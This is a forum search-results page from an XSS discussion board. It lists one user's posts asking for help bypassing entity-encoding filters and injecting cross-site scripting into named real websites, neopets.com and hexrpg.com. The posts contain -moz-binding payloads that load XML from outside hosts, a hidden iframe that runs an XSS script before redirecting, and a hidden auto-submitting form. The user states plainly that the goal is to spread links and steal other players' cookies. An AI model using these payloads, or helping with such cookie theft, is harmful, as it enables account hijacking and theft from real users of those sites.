Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Current Page: 1 of 1
Results 1 - 16 of 16
7 years ago
robertanderson
It is a text box I did " style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss) and the source gave me <a href='index.php?act=search&code=search&do=show&item=&quot; style=&quot;-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss) &page=10' title='2'> Still nothing happened ----- I did ' style='-moz-binding:url(http://ha.ckers.org/xssm
Forum: XSS Info
7 years ago
robertanderson
Need help with replacements. < turns into &lt; > turns into &gt; ' turns into &#39; '<script>alert(1)</script> turns into &#39;&#60;script&gt;alert(1)&lt;/script&gt; How can I get around this?
Forum: XSS Info
7 years ago
robertanderson
If you would give me an example I would learn how that vulnerability is possible. Plus I don't even know what to test...I am totally lost. All I know how to do is stick in <script>alert('xss')</script. What other things can I test it with? All I see is this... <!-- function check(){ if (document.getElementById('search').value == ''){ alert('Please fill out a value.');
Forum: XSS Info
7 years ago
robertanderson
Any other ways...how about something for... http://www.hexrpg.com/userinfo.php?user=adsasd or http://www.hexrpg.com/store/store.php?user=sadasd
Forum: XSS Info
7 years ago
robertanderson
Well I am trying to learn simply XSS techniques to detect vulnerabilities... Say I get any website, lets take http://www.hexrpg.com/ how could I find XSS vulnerbalities.... I know its <script>alert('cool')</script> but where exactly do I put that in the url....like I try... http://www.hexrpg.com/index.php?<script>alert('cool')</script> and nothing happens...
Forum: XSS Info
7 years ago
robertanderson
Thanks for trying but this time when i enter the url it waits 2 seconds then again goes straight to google. Here's my current code... <iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe> <script> pause(2000) location.href="http://www.google.com" function pause(millisecond) { var now = new Date(); var exitTime =
Forum: XSS Info
7 years ago
robertanderson
So what do I do? <iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe> <script> location.href="http://www.google.com" </script> I was thinking something involving settimeout...can't figure out the quotation marks though they seem different in JS.
Forum: XSS Info
7 years ago
robertanderson
Ohhh how cool, thanks! Quick question, one...do you have aim or msn? two... I'm trying to do <iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe> <script> location.href="http://www.google.com" </script> So it does the xss script and then goes to google...but it seems like it just goes to google and for
Forum: XSS Info
7 years ago
robertanderson
<iframe> code </iframe> Like that? lol
Forum: XSS Info
7 years ago
robertanderson
Thanks a lot guys, I got that working. I was able to put the cg script into an iFrame, I was wondering if I could put the POST action in an iFrame so the user doesn't see it? Because how it is it comes up as... ERROR : Sorry, nothing with the name '" style=-moz-binding:url(//XXXXX.XXXXXX.us/daxml.xml#xss)' exists. Please try again! People will see my site url then, which I don't
Forum: XSS Info
7 years ago
robertanderson
Ok I fixed it now and it's still not working... My script on php page...
Forum: XSS Info
7 years ago
robertanderson
...
Forum: XSS Info
7 years ago
robertanderson
Where do I put all the... <form method='post' name='xss' action='http://www.neopets.com/search.phtml?q=Z'> client:<input input="text" value="pub-9208792519293771" name="client" style="width:0%" /><br /> forid:<input input="text" value="1" name="forid" style="width:0%" /><br /> ie:<
Forum: XSS Info
7 years ago
robertanderson
Now how would I go about linking that to my php cookie script and spreading the link around so I can embed it onto pages thus stealing other cookies?
Forum: XSS Info
7 years ago
robertanderson
http:/www.neopets.com Online virtual pet site, it has over 1.5 million players and the currency has value. Looks please ^_^
Forum: XSS Info
7 years ago
robertanderson
I heard it's really really hard to find a vulnerability in Neopet's and it's very wanted incase you guys don't know. Try to look for one? It's appreciated, thanks.
Forum: XSS Info
Current Page: 1 of 1